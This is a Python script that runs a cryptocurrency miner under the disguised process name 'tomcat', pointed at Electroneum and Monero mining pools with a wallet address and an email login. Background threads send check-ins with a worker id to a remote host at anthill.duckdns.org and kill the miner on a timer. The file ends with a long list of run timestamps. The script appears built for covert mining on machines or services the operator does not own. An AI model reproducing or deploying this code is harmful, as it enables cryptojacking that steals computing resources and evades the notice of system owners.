import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:05.340145
#2018-02-17 17:16:07.581562
#2018-02-17 19:03:03.416696
#2018-02-17 20:51:06.908845
#2018-02-17 22:38:05.560458
#2018-02-18 00:22:01.825129
#2018-02-18 02:13:06.079892
#2018-02-18 04:01:07.043752
#2018-02-18 05:49:03.492413
#2018-02-18 07:41:05.332126
#2018-02-18 09:28:03.963506
#2018-02-18 11:14:06.266352
#2018-02-18 13:01:06.013568
#2018-02-18 14:49:01.491682
#2018-02-18 16:36:07.109174
#2018-02-18 18:25:04.460631
#2018-02-18 20:12:05.017227
#2018-02-18 21:58:06.081191
#2018-02-18 23:47:04.352360
#2018-02-19 01:33:01.506831
#2018-02-19 03:21:05.259130
#2018-02-19 05:06:01.439887
#2018-02-19 06:52:03.982517
#2018-02-19 08:41:01.998070
#2018-02-19 10:29:08.036654
#2018-02-19 12:17:02.160042
#2018-02-19 14:03:08.754840
#2018-02-19 15:52:04.837335
#2018-02-19 17:40:01.300332
#2018-02-19 19:27:04.278673
#2018-02-19 21:13:02.096352
#2018-02-19 22:59:07.020478
#2018-02-20 00:44:05.342926
#2018-02-20 02:35:01.706800
#2018-02-20 04:23:01.988799
#2018-02-20 06:07:02.055433
#2018-02-20 07:51:07.728383
#2018-02-20 09:36:06.383021
#2018-02-20 11:21:04.079464
#2018-02-20 13:07:05.810768
#2018-02-20 14:52:01.892284
#2018-02-20 16:37:08.879770
#2018-02-20 18:22:08.351600
#2018-02-20 20:12:07.206297
#2018-02-20 21:59:01.672747
#2018-02-20 23:41:04.454636
#2018-02-21 01:25:03.164820
#2018-02-21 03:12:06.529570
#2018-02-21 04:59:07.052122
#2018-02-21 06:48:01.427875
#2018-02-21 08:35:07.740751
#2018-02-21 10:21:02.207166
#2018-02-21 12:08:05.531251
#2018-02-21 13:57:06.186983
#2018-02-21 15:41:01.739414
#2018-02-21 17:32:06.847127
#2018-02-21 19:18:18.738739
#2018-02-21 21:06:08.390215
#2018-02-21 22:56:05.885678
#2018-02-22 00:44:06.061732
#2018-02-22 02:33:03.379441
#2018-02-22 04:19:03.447398
#2018-02-22 06:06:01.662637
#2018-02-22 07:51:05.025768
#2018-02-22 09:40:09.890124
#2018-02-22 11:25:04.598346
#2018-02-22 13:10:07.787151
#2018-02-22 14:59:08.853796
#2018-02-22 16:43:06.675106
#2018-02-22 18:31:01.645250
#2018-02-22 20:23:04.243563
#2018-02-22 22:08:07.927216
#2018-02-22 23:54:06.475878
#2018-02-23 01:42:06.588941
#2018-02-23 03:28:03.836599
#2018-02-23 05:14:03.796910
#2018-02-23 06:59:05.775046
#2018-02-23 08:48:07.003925
#2018-02-23 11:09:08.351659
#2018-02-23 13:02:07.540504
#2018-02-23 14:47:05.574490
#2018-02-23 16:36:06.169246
#2018-02-23 18:22:06.901941
#2018-02-23 20:08:06.203574
#2018-02-23 21:55:08.565142
#2018-02-23 23:45:06.779779
#2018-02-24 01:38:06.867619
#2018-02-24 03:27:06.818983
#2018-02-24 05:12:06.078799
#2018-02-24 07:00:11.080605
#2018-02-24 08:49:04.694141
#2018-02-24 10:53:05.235572
#2018-02-24 12:41:06.510392
#2018-02-24 14:29:05.749970
#2018-02-24 16:17:05.870330
#2018-02-24 18:11:06.263053
#2018-02-24 19:57:02.176615
#2018-02-24 21:41:06.796100
#2018-02-25 00:34:05.135614
#2018-02-25 04:11:04.330846
#2018-02-25 07:41:07.530211